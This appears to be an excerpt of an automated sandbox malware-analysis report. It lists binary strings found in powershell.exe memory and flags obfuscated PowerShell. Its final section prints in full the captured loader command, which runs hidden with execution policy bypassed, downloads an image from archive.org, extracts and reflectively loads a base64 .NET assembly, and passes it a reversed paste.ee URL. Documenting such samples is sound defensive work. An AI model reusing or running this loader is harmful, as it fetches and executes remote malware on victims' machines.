Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QEwzeZKCXN.exe, 0000000A.00000002.3409362566.000000000013E000.00000002.00000001.01000000.00000006.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808153383.000000000013E000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdbGCTL source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dllhost.pdb source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dllhost.pdbGCTL source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
